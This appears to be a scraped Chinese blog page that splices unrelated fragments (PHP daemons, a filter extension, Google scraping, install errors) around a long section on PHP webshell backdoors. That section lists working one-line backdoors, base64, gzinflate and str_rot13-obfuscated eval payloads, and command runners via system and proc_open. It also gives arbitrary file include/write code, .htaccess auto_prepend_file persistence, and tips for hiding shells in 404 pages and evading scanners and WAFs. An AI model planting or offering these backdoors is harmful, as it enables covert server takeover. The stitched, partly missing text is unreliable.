沧海一粟

　　应用场景
　　
　　某些情况下，我们需要持续的周期性的提供一些服务，比如监控内存或cpu的运行状况，这些应用与客户端是没有关系的，不是说客户端（如web界面，手机app等）关闭了，我们就不监控内存或cpu了，为了应对这种业务场景，后台守护进程就可以派上用场了。

　　守护进程（Daemon）是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。
　　
　　1、基本概念
　　
　　进程
　　
　　每个进程都有一个父进程，子进程退出，父进程能得到子进程退出的状态。

1.安装libiconv，这个是libdatrie的依赖项

关键词过滤扩展，用于检查一段文本中是否出现敏感词，基于Double-Array Trie 树实现。

安装步骤

下面的$LIB_PATH为依赖库安装目录，$INSTALL_PHP_PATH为PHP5安装目录。

要提取google搜索的部分数据，发现google对于软件抓取它的数据屏蔽的厉害，以前伪造下 USER-AGENT 就可以抓数据，但是现在却不行了。利用抓包数据发现，Google 判断了 cookies，当你没有cookies的时候，直接返回 302 跳转，而且是连续几十个302跳转，根本抓不了数据。
因此，在发送搜索命令时，需要先提取 cookies 并保存，然后利用保存下来的这个cookies再次发送搜索命令即可正常抓数据了。这其实和论坛的模拟登录一个道理，先POST登录，获取cookies并保存，然后利用这个cookies访问就可以了。

0x01 查看访问日志

看是否有文件上传操作(POST方法)，

nginx默认记录的日志格式为：  

    我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马



404页面是网站常用的文件，一般建议好后很少有人会去对它进行检查修改，这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话


将$_POST['code']的内容赋值给$_SESSION['theCode']，然后执行$_SESSION['theCode']，亮点是没有特征码。用扫描工具来检查代码的话，是不会报警的，达到目的了。

超级隐蔽的PHP后门




执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。

层级请求，编码运行PHP后门

此方法用两个文件实现，文件1


文件2


通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果，一般waf对referer这些检测要松一点，或者没有检测。用这个思路bypass
waf不错。

PHP后门生成工具weevely

    weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web
页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。

    weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。

    以上是大概介绍下边是截图，相关使用方法亦家就不在这介绍了，简单的科普一下。


三个变形的一句话PHP木马

第一个：


在菜单里写 1.php?2=assert 密码是1。

第二个：


在菜刀里写2.php?_=assert&__=eval($_POST['pass'])
密码是pass。如果你用菜刀的附加数据的话更隐蔽，或者用其它注射工具也可以，因为是post提交的。

第三个：



str_rot13(‘riny’)即编码后的eval，完全避开了关键字，又不失效果，让人吐血！

如何应对PHP一句话后门

我们强调几个关键点，看这文章的你相信不是门外汉，我也就不啰嗦了：

1，对PHP程序编写要有安全意识。
2，服务器日志文件要经常看，经常备份。
3，对每个站点进行严格的权限分配。
4，对动态文件及目录经常批量安全审查。
5，学会如何进行手工杀毒《即行为判断查杀》。
6，时刻关注，或渗入活跃的网络安全营地。
7，对服务器环境层级化处理，哪怕一个函数也可做规则。

首先建立一PHP文件test.php 文件内容为:
　　
　　Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了， 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行返回的结果都可以看到。 　　

方法2现在的webshell是越来越流行了，连php的后门也追上来了，主要的有angel的phpspy和 lanker的一句话后门！所以现在最主要的是怎么隐蔽我们的后门，想必看完我的文章大家都有自己各自的想法了。其实lanker的一句话后门确实很强大，但是要用户使用客户端的话会带来一些不必要的麻烦，虽然可以使程序没有记录，（POST没记录的哦）但是对于一般的站点这其实并不是很重要。有没与想过把phpspy插到一个文件里去呢？没有想过吗？呵呵，跟我来，我们用记事本打开phspy就好了，搜索登录入口四个字。 在

现在你可以把这一个phpspy都写到对方的某个正常的php文件里，直接浏览是看不出问题的喔，我们要登录的时候就直接在文件名后面加上?name= wrsky才可以看到 当然你也可以改成别的，只要替代上面 代码里的name和wrsky就可以的，相信自己动手你会觉得收获很大的。如果你要自己改写一些简单的代码而你又不会php的话，这里就有样东西要介绍给你哦~php后门插入器，呵呵，你可以在http://www.wrsky.com 火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。 呵呵~红色的喔，粉PP吧~~我们来测试一下，我在这里提供一段 代码

这段 代码是执行cmd命令的，我们利用插入 工具 进行插入看看！ 没插入前的样子我的设置为参数名为name，参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了，你也可以写成 /home/imaboy/bk.php（因为这是 linux 系统） 显示写入文件成功，我们开始连接咱的木马，以为我用的参数的name，值是wrsky，所以连接方式为 木马 所在地址?name=wrsky 大家可以看到，在输入后面的参数后运行完全正常，而且不易被发现喔，很可能被带到另外一台主机上去喔 。 ，
呵呵，只要想一点，你们肯定还会有更好的办法的！

php后门木马常用的函数大致上可分为四种类型：
　　1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
　　2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
　　3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
　　4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
　　1. 执行系统命令:
　　system 函数
　　//test.php?cmd=ls
　　system($_GET[cmd]);
　　passthru 函数
　　//test.php?cmd=ls
　　passthru($_GET[cmd]);
　　shell_exec 函数
　　//test.php?cmd=ls
　　echo shell_exec($_GET[cmd]);
　　exec 函数
　　//test.php?cmd=ls
　　$arr = array();
　　exec($_GET[cmd],$arr);
　　print_r($arr);
　　popen 函数
　　//test.php?cmd=ls
　　$handle = popen('$_GET[cmd], 'r');
　　$read = fread($handle, 2096);
　　echo $read;
　　pclose($handle);
　　proc_open 函数
　　//test.php?cmd=ls
　　$descriptorspec = array(
　　0 => array('pipe', 'r'),
　　1 => array('pipe', 'w'),
　　2 => array('pipe', 'w'),
　　);
　　$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
　　fclose($pipes[0]);
　　$output = array();
　　while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
　　print_r($output);
　　2. 代码执行与加密:
　　eval 函数
　　//最常见的一句话木马
　　eval($_POST[cmd]);
　　base64_decode 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
　　gzinflate 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
　　gzuncompress 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
　　gzdecode 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST['cmd']);
　　eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
　　str_rot13 函数
　　//为了免杀及隐藏而加密代码
　　//密文: eval($_POST[cmd]);
　　eval(str_rot13('riny($_CBFG[pzq]);'));
　　assert 函数
　　//类似eval函数
　　assert($_POST[cmd]);
　　call_user_func 函数
　　//使用call_user_func调用assert
　　call_user_func('assert',$_POST[cmd]);
　　call_user_func 函数
　　//使用call_user_func调用任意函数
　　//test.php?a=assert&cmd=phpinfo()
　　call_user_func($_GET[a],$_REQUEST[cmd]);
　　组合代码
　　//组合方式调用任意函数
　　//test.php?a=assert&cmd=phpinfo()
　　$_GET[a]($_REQUEST[cmd]);
　　3. 文件包含与生成:
　　require 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　require($_GET[file]);
　　require_once 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　require_once($_GET[file]);
　　include 函数
　　//包含任意文件 www.jb51.net
　　//test.php?file=123.jpg
　　include($_GET[file]);
　　include_once 函数
　　//包含任意文件
　　//test.php?file=123.jpg
　　include_once($_GET[file]);
　　file_get_contents 函数
　　//读取任意文件
　　//test.php?f=config.inc.php
　　echo file_get_contents($_GET['f']);
　　file_put_contents 函数
　　//生成任意内容文件
　　//a=test.php&b=
　　file_put_contents($_GET[a],$_GET[b]);
　　fputs 函数
　　//生成任意内容文件
　　//a=test.php&b=
　　fputs(fopen($_GET[a],"w"),$_GET[b]);
　　4. .htaccess:
　　SetHandler
　　//可将php代码存于非php后缀文件,例: x.jpg
　　//将以下代码写入.htaccess中
　　//连接x.jpg即可启动后门木马出处www.admin8.us
　　
　　SetHandler application/x-httpd-php
　　
　　auto_prepend_file
　　//可将php代码存于非php后缀文件,例: 123.gif
　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径
　　//访问网站上任何php文件都会启动该php后门木马
　　//可在不更改站点源代码的情况下记录所有$_REQUEST的值，也可批量挂马
　　php_value auto_prepend_file c:/apache2/htdocs/123.gif
　　auto_append_file
　　//类似auto_prepend_file
　　//可将php代码存于非php后缀文件,例: 123.gif
　　//将以下代码写入.htaccess中, 文件路径必须是绝对路径
　　//访问网站上任何php文件都会启动该php后门木马
　　php_value auto_append_file c:/apache2/htdocs/123.gif
防范方法：通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 http://www.jb51.net/article/19292.htm

PHP的安装虽然有时候很简单,可是如果应用一多,我们安装起来就很头痛了!常见的就是PHP插件的安装问题最多了!

       其实不管是你是Apache类的应用还是Nginx类的.PHP的安装都不是很简单,虽然网上很多configure,但是那不一定是适合你的,因为很多都直接关系着你的系统及系统版本和内核.那下面就进入正题

    首先来一个最常见的就是configure: error: libjpeg.(a|so) not found